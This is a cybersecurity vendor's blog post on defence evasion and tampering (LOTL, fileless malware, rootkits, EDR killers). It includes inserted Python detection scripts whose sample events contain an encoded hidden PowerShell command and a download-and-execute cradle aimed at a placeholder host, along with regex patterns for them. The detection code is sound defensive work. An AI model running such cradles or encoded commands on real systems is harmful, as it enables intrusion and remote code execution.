Most organisations are familiar with prominent cybersecurity threats such as phishing, ransomware, and insider threats. While they focus on addressing these well-known dangers, a more subtle menace is growing at an alarming pace: defence evasion and tampering. These techniques enable attackers to infiltrate an organisation stealthily, take down its defences, and compromise systems – often going unnoticed until it’s too late.
As organisations invest in security tools and monitoring capabilities, adversaries aren’t simply breaking through the front door; they focus on being invisible to the security cameras – and they’re becoming experts at bypassing and disabling security controls so they can walk right past them. The result? A growing threat where traditional defence architectures are increasingly blind to sophisticated attacks.
Understanding defence evasion and tampering
To understand the importance of this threat, let’s break down the terms.
MITRE defines defence evasion as “techniques that adversaries use to avoid detection throughout their compromise”. In other words, adversaries use defence evasion techniques to hide their presence and malicious activities from the security tools designed to catch and stop them. Techniques range from disguising malicious code to using legitimate tools in harmful ways.
Tampering goes a step further. It involves altering, disabling, or corrupting security tools to disrupt them and make them ineffective. For example, attackers can modify or delete system logs to hide their activities from security products or disable antivirus programmes altogether. In the MITRE ATT&CK framework, tampering is “impairing defences”. Defined as techniques used “to hinder or disable defensive mechanisms”, it falls under the broader Defence Evasion category.
Defence evasion and tampering techniques are often used together. Picture an intruder not only sneaking past a building’s security cameras but also wearing an employee uniform to blend in, turning off the alarms, and erasing all footage of their presence. This is the level of sophistication we’re dealing with.
What makes these attacks particularly dangerous is their dual nature. First, they allow attackers to operate undetected within compromised environments. Second, and perhaps more critically, they tamper with the very security tools designed to detect them.
But how is this possible? Defence evasion and tampering techniques are largely feasible because malware operates within the same environment as the defence solutions. Running at the same privilege level, malware can use the same permissions and resources that the defences rely on, for example to modify system files or alter running processes. This proximity also means malware can directly observe, interact with, and manipulate security systems, creating a critical weakness in cybersecurity defences.
Why malware defence evasion and tampering is a growing threat
Defence evasion is not new. Attackers have always been interested in staying under the radar to achieve their objectives without interference from defenders. However, defence evasion through tampering is a growing problem.
A report published last year showed that 70% of malware now employs stealth-oriented techniques to make detection more challenging for defenders. It revealed an even more alarming trend: a 333% YoY increase in malware capable of impairing defences such as next-gen firewalls, antivirus and EDR solutions. The report highlighted,
“A year ago, it was relatively rare for adversaries to disable security controls. Now, this behaviour is seen in a quarter of malware samples and is used by virtually every ransomware group and Advanced Persistent Threat (APT) group.”
Several factors contribute to this growing trend:
- Increasing sophistication of adversaries: As technological innovation around defensive technologies has increased, so has attackers’ sophistication of techniques to evade and impair defences. Threat actors and APT groups invest heavily in developing tools and techniques that can outsmart traditional security measures.
- Broader accessibility of tools: These once-exclusive capabilities are now widely available on dark web marketplaces. This commodification of advanced attack tools has made sophisticated evasion techniques accessible to a broader range of attackers, enabling even less-skilled attackers to use them.
- Growing infrastructure complexity: Modern IT environments, with their mix of cloud services, virtualised systems, and remote work infrastructure, create perfect conditions for evasion. They are harder to monitor comprehensively, creating blind spots that adversaries can exploit.
Common scenarios and techniques
Threat actors use a complex arsenal of techniques. By understanding the tactics they employ, organisations can remain vigilant and identify the most effective measures and tools to thwart defence evasion and tampering attempts. Here are some examples of the most prevalent scenarios and techniques.
Living-off-the-Land attacks
In Living-off-the-Land (LOTL) attacks, adversaries leverage existing, legitimate software within a target environment to carry out their activities; the abused native binaries are often called LOLBins. Instead of using external malicious files or scripts, they execute their payloads using native system tools like PowerShell, Windows Management Instrumentation (WMI), or Remote Desktop Protocol (RDP). Since these techniques don’t introduce new files or programmes into the system, LOTL attacks don’t trigger alerts from traditional security tools designed to monitor and block unfamiliar or suspicious external programmes, and can operate undetected for extended periods.
Fileless malware
Fileless malware resides entirely in a system's memory rather than being stored on disk. It typically exploits vulnerabilities in system processes or applications and runs without leaving any lasting footprint. This enables it to bypass traditional file-based and signature-based antivirus and endpoint detection systems, as there are no files to scan or flag. Its use of legitimate system functions and its ephemeral nature make it difficult to detect and identify once executed.
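Because LOTL and fileless activity produce no new file to scan, detection has to come from process telemetry: which binary ran, what its parent was, and what its command line looked like. The following is an added example (not code from the original article or from Ryzome) showing how a small set of behavioural rules can be run over process-creation records. The records are constructed for this example in the shape of Sysmon Event ID 1 / EDR process telemetry; the field names, the list of Office applications and script hosts, and the regular expressions are assumptions a practitioner would tune for their own environment.

```python
import re

# Constructed process-creation records (Image, ParentImage, CommandLine) in the
# style of Sysmon Event ID 1 / EDR telemetry. All values are invented for this
# example; event 2 carries a truncated base64 blob.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"id": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBi..."},
    {"id": 3, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic process call create "notepad.exe"'},
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"id": 5, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Assumed allow/deny vocabularies; extend to match the estate being monitored.
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = POWERSHELL | {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Simplified heuristics. PowerShell accepts any unambiguous prefix of a switch,
# so -e, -ec, -enc and -encodedcommand all select -EncodedCommand.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}")
IEX_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
DOWNLOAD_RE = re.compile(r"(?i)\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b")
WMI_CREATE_RE = re.compile(r"(?i)\bprocess\s+call\s+create\b")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the list of behavioural reasons this process event is suspicious."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    reasons = []
    if image in POWERSHELL and ENCODED_RE.search(cmd):
        reasons.append("encoded PowerShell command line")
    if image in POWERSHELL and IEX_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
        reasons.append("in-memory download-and-execute cradle (fileless)")
    if image == "wmic.exe" and WMI_CREATE_RE.search(cmd):
        reasons.append("process creation via WMI")
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"script host {image} spawned by Office application {parent}")
    return reasons


def analyse(events: list) -> dict:
    """Map event id -> reasons, for events that triggered at least one rule."""
    return {e["id"]: r for e in events if (r := classify(e))}


if __name__ == "__main__":
    for event_id, reasons in analyse(SAMPLE_EVENTS).items():
        print(event_id, "->", "; ".join(reasons))
```

Events 2, 3 and 4 are flagged on behaviour alone, even though every binary involved is a signed Microsoft component; event 1 (an administrator querying services) and event 5 are left alone. The Office-parent rule is deliberately independent of the command line, so an obfuscated launcher still trips it.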
Rootkits
Rootkits are malicious tools designed to provide attackers with privileged access to a compromised system while hiding their presence. They often work by altering core system functions, such as the kernel (i.e., the brain of the system). Once installed, rootkits can conceal files, processes, or network connections, allowing adversaries to maintain control over the system and evade detection from security tools or system administrators. Rootkits can disable or interfere with endpoint detection and response (EDR) solutions, making them particularly dangerous in long-term, stealthy attacks where threat actors want to maintain persistent, undetected access to critical systems.
EDR Killers
EDR killers are tools whose purpose is to disable or evade EDR solutions, which are essential for detecting and responding to malicious activity on endpoints. Adversaries often use a variety of techniques to target and bypass these systems, such as injecting malicious code into EDR processes, exploiting vulnerabilities in the EDR software, or using anti-EDR evasion tools to disable the monitoring mechanisms. EDR killers are increasingly popular among threat actors due to their ability to neutralise a key layer of defence. Notable ransomware operators, such as FIN7, RansomHub and Qilin, have weaponised EDR killers to hinder detection capabilities. The black market for these evasion kits is flourishing, and listings for EDR killer tools can be found on the dark web.
These are just a few examples; the MITRE ATT&CK framework provides a detailed list of known, specific defence evasion techniques. Yet they underscore the urgency for organisations to evolve their security strategies and tools.
How to detect and mitigate defence evasion and tampering
To detect and mitigate attacks using defence evasion and tampering, organisations must implement proactive strategies and robust technologies. Here are five best practices to adopt.
1. Implement a defence-in-depth strategy
There is no such thing as a silver bullet in cybersecurity. Above all, a robust and comprehensive defence-in-depth strategy, with multiple layers of protection, is crucial. The guiding principle of this strategy is the idea that a single security product cannot fully safeguard an environment from every attack it might face. Implementing multiple security controls, however, allows organisations to detect threats and prevent data breaches more effectively. If one line of defence is compromised, others will be in place to ensure threats don't slip through the cracks. This minimises the risk of threats bypassing all defences and provides additional time to detect and respond.
2. Ensure continuous, real-time monitoring
Attackers using defence evasion and tampering techniques often exploit gaps in visibility created by periodic monitoring solutions. They may execute malicious actions – like disabling security tools, modifying logs, or injecting code – and revert the system to its original state before the next snapshot, leaving no trace. Continuous, real-time monitoring eliminates these blind spots by capturing all activity as it happens. This ensures that unusual and suspicious behaviours are detected immediately, allowing security teams to investigate and respond without delay. This real-time visibility is essential for catching sophisticated threats that aim to exploit even the smallest window of opportunity.
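The tampering described earlier (stopping a security service, turning off real-time protection, clearing logs) and the monitoring gap described in this section are both visible in an event stream, provided the stream is consumed as it arrives rather than sampled. The following is an added example (not from the original article or from Ryzome) that runs two checks over a constructed Windows-style event log: one flags well-known tampering events, and one flags silence from a sensor that is expected to report on a fixed interval, since an agent that stops sending heartbeats is exactly the blind spot an attacker wants to create. The event IDs are standard Windows identifiers (Security 1102 and System 104 for a cleared log, Windows Defender 5001 for real-time protection disabled, Service Control Manager 7036/7040 for a service state or start-type change); the record layout, the field names in `data`, the service names in `PROTECTED_SERVICES` and the `Agent` heartbeat channel are assumptions made for this example.

```python
from datetime import datetime, timedelta

# Services whose stopping or disabling should always raise an alert.
# Assumed names for this example (WinDefend = Defender AV, Sense = Defender
# for Endpoint); replace with the agents deployed in your environment.
PROTECTED_SERVICES = {"windefend", "sense", "example-edr-agent"}

# Constructed log. Real Windows events carry far more fields; only the ones
# the rules below need are kept, and the "Agent" channel is an assumed
# heartbeat emitted by a monitoring sensor once per minute.
T0 = datetime(2024, 6, 1, 9, 0, 0)
SAMPLE_LOG = [
    {"ts": T0, "channel": "Agent", "event_id": 1, "data": {}},
    {"ts": T0 + timedelta(seconds=10), "channel": "Security", "event_id": 4624,
     "data": {"user": "CORP\\alice"}},
    {"ts": T0 + timedelta(seconds=60), "channel": "Agent", "event_id": 1, "data": {}},
    {"ts": T0 + timedelta(seconds=90), "channel": "System", "event_id": 7036,
     "data": {"service": "WinDefend", "state": "stopped"}},
    {"ts": T0 + timedelta(seconds=91), "channel": "Microsoft-Windows-Windows Defender/Operational",
     "event_id": 5001, "data": {}},
    {"ts": T0 + timedelta(seconds=100), "channel": "System", "event_id": 7040,
     "data": {"service": "WinDefend", "new_start_type": "disabled"}},
    {"ts": T0 + timedelta(seconds=120), "channel": "Agent", "event_id": 1, "data": {}},
    {"ts": T0 + timedelta(seconds=150), "channel": "Security", "event_id": 1102,
     "data": {"user": "CORP\\alice"}},
    # Five minutes of silence from the sensor, then it reappears.
    {"ts": T0 + timedelta(seconds=420), "channel": "Agent", "event_id": 1, "data": {}},
]


def tampering_alerts(events: list) -> list:
    """Return (timestamp, message) for each event that indicates impaired defences."""
    alerts = []
    for e in sorted(events, key=lambda x: x["ts"]):
        ch, eid, d = e["channel"], e["event_id"], e["data"]
        svc = d.get("service", "").lower()
        if ch == "Security" and eid == 1102:
            alerts.append((e["ts"], f"Security audit log cleared by {d.get('user', '?')}"))
        elif ch == "System" and eid == 104:
            alerts.append((e["ts"], "System event log cleared"))
        elif eid == 5001 and "Windows Defender" in ch:
            alerts.append((e["ts"], "Defender real-time protection disabled"))
        elif ch == "System" and eid == 7036 and svc in PROTECTED_SERVICES and d.get("state") == "stopped":
            alerts.append((e["ts"], f"protected service {svc} stopped"))
        elif ch == "System" and eid == 7040 and svc in PROTECTED_SERVICES and d.get("new_start_type") == "disabled":
            alerts.append((e["ts"], f"protected service {svc} set to disabled"))
    return alerts


def heartbeat_gaps(events: list, expected: timedelta = timedelta(seconds=60),
                   tolerance: float = 2.0) -> list:
    """Return (last_seen, next_seen) pairs where the sensor was silent for
    longer than tolerance * expected interval."""
    beats = sorted(e["ts"] for e in events if e["channel"] == "Agent" and e["event_id"] == 1)
    return [(prev, cur) for prev, cur in zip(beats, beats[1:]) if cur - prev > expected * tolerance]


if __name__ == "__main__":
    for ts, msg in tampering_alerts(SAMPLE_LOG):
        print(ts.isoformat(), "TAMPERING:", msg)
    for last, nxt in heartbeat_gaps(SAMPLE_LOG):
        print(f"sensor silent from {last.isoformat()} to {nxt.isoformat()}")
```

The point of the second check is the one the section makes: a monitor that only polls state every few minutes would see the agent "running" at both ends of the gap. Consuming the stream continuously turns the missing heartbeats themselves into the signal, and the log-clear event at 1102 is caught even if the attacker later restores everything.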
3. Leverage advanced threat detection tools
Modern threats require modern tools. Traditional security tools alone – such as antivirus, firewalls, and endpoint protection platforms (EPP) – are no longer sufficient. Organisations must invest in advanced threat detection systems that focus on identifying Tactics, Techniques and Procedures (TTPs) used by adversaries, rather than static databases of malware signatures, to detect threats. Unlike signature-based detection tools, they can detect subtle signs of an attack and help uncover malicious actors trying to bypass defences. Importantly, modern security tools should be tamper-resistant by design. This means they are built to withstand unauthorised access or modification, ensuring that attackers cannot easily disable or evade them. For instance, security systems which run within the environment they need to protect (e.g., within the endpoint itself), at the same level as attackers, are not tamper-resistant by design. They may have anti-tampering mechanisms in place, but it’s a cat-and-mouse game where the one with the most sophisticated technique wins.
4. Employ integrity monitoring
Integrity monitoring helps detect unauthorised changes to critical files, configurations, and system settings. Adversaries increasingly operate at the kernel level to gain deeper control and evade detection. Kernel integrity monitoring is crucial in these cases, as it tracks changes to the core components of the operating system, ensuring they remain unaltered by malicious actors. Real-time alerts from integrity monitoring tools allow security teams to quickly identify and respond to stealthy malware, whether at the application layer or deep within the system’s kernel, preventing attackers from gaining persistent control.
5. Ensure timely patching and updates
Last but not least, keeping systems and software up to date is a fundamental part of good cybersecurity hygiene. While timely patching does not directly address the detection of defence evasion and tampering, it helps close the door to such attempts by eliminating known vulnerabilities that attackers could exploit. Regular updates ensure that security gaps are patched promptly, making it harder for attackers to find entry points or exploit outdated defences. By maintaining an up-to-date environment, organisations can reduce their risk exposure and avoid making it easier for attackers to bypass security measures.
With such capabilities and strategies, organisations can strengthen their defences against advanced threats that use defence evasion and tampering techniques, ensuring that even the most sophisticated attackers have limited opportunities to succeed.
Why organisations must act now
With so many security threats to address and limited budgets to allocate, why should organisations place these threats at the top of their agenda? The answer is simple: because they are the hardest to detect and potentially the most damaging ones.
The rising prevalence of defence evasion and tampering techniques demands immediate attention. What makes these techniques so dangerous is their role as enablers, allowing threat actors to orchestrate successful attacks and data breaches. The consequences can be devastating, affecting organisations in several ways:
- Extended breach durations: Attackers who successfully evade detection can linger within an organisation’s infrastructure for weeks or months, gathering data and escalating their attacks. According to IBM’s Cost of a Data Breach Report, the average time to identify a cyber attack in 2024 is 194 days – more than half a year.
- Operational disruptions: Tampered security systems may fail when needed most, leaving organisations vulnerable during critical incidents and making it difficult to investigate and respond to threats.
- Financial losses: The cost of remediating a breach, coupled with potential fines for regulatory non-compliance, can cripple businesses. The IBM report also revealed that the global average cost of a data breach reached $4.88 million in 2024.
- Reputational damage: A high-profile breach can erode customer trust, causing long-term harm to an organisation’s brand.
At a time when the stakes have never been higher, prioritising defences against these techniques is not just prudent – it’s essential for long-term resilience.
How Ryzome can help
At Ryzome, we help organisations fight against these elusive threats. Our solution, Ryzome Security Monitor, provides an essential and complementary layer of security for your business-critical virtual machines and reduces risk in your cloud and virtual environments, which are prime targets for modern attacks.
Ryzome Security Monitor’s capabilities provide you with:
- Continuous, real-time visibility that instantly alerts you to malicious activity related to defence evasion.
- The detection of exploits against the kernel, which allow attackers to bypass your security mechanisms and can lead to a complete system compromise and data breach.
- A record of artifacts (i.e., the residual traces left behind by the actions of attackers), often successfully deleted without the right tools in place, to help you investigate and respond to incidents effectively.
Notably, Ryzome Security Monitor’s architecture and implementation make it inherently resistant to defence evasion and tampering – by design, not just as an added feature – a decisive factor in the battle against advanced threats that employ sophisticated techniques to bypass and impair defences.
Contact us for a demo to see how Ryzome can detect threats capable of sidestepping existing security mechanisms.